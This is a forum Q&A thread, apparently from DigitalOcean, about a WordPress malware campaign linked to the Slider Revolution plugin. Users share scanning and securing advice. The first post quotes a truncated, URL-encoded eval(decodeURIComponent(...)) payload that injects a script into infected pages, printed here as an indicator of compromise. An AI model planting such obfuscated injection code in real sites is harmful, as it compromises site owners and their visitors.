Looks like another WordPress exploit.: Some 100,000 or more WordPress sites infected by mysterious malware
Just checked all my sites and they look good. I did not bother using the suggested site scanner, but rather looked at the source code of all pages, since this:
“The in-the-wild attack observed by Sucuri causes infected sites to load highly obfuscated attack code on every webpage that includes the following:”
eval(decodeURIComponent
("%28%0D%0A%66%75%6E%63%74%69%6F%6E%28%29%0D%0A%7B%0D%..72%69%70%74%2E%69%64%3D%27%78%78%79%79%7A%7A%5F%70%65%74%75%73%68%6F%6B%27%3B%0D%0A%09%68%65%61%64%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%63%72%69%70%74%29%3B%0D%0A%7D%28%29%0D%0A%29%3B"));
From what I have read, this was specific to sites using Slider Revolution, a premium WordPress plugin/
This textbox defaults to using Markdown to format your answer.
You can type !ref in this text area to quickly search our full set of tutorials, documentation & marketplace offerings and insert the link!
These answers are provided by our Community. If you find them useful, show some love by clicking the heart. If you run into issues leave a comment, or add your own answer to help others.
Want to learn more? Join the DigitalOcean Community!
Join our DigitalOcean community of over a million developers for free! Get help and share knowledge in Q&A, subscribe to topics of interest, and get courses and tools that will help you grow as a developer and scale your project or business.
Hello there,
The revolution slider is known for having security vulnerabilities and I’ll recommend using another gallery plugin for your WordPress site.
It is essential to secure your droplet, however running malware software is not definitely a must, but it is still a good thing to do.
I’ll highly recommend checking our tutorial An Introduction to Securing your Linux VPS
https://www.digitalocean.com/community/tutorials/an-introduction-to-securing-your-linux-vps
I can recommend using software like Linux Malware Detect which is a malware scanner for Linux.
Hope that this helps!
TO check, use websites like https://www.virustotal.com/ for URL scanner !!
Thank you so much for posting this, my entire site got it’s poo pushed in.
Thank god I used a backup plugin.
The attack blocked me out of my admin panel, corrupted the entire website - I’m still learning on Wordpress stuff, so I would’ve lost 5 months without a backup plugin.
Thanks for posting this, I’ve disabled the slide plugin right away.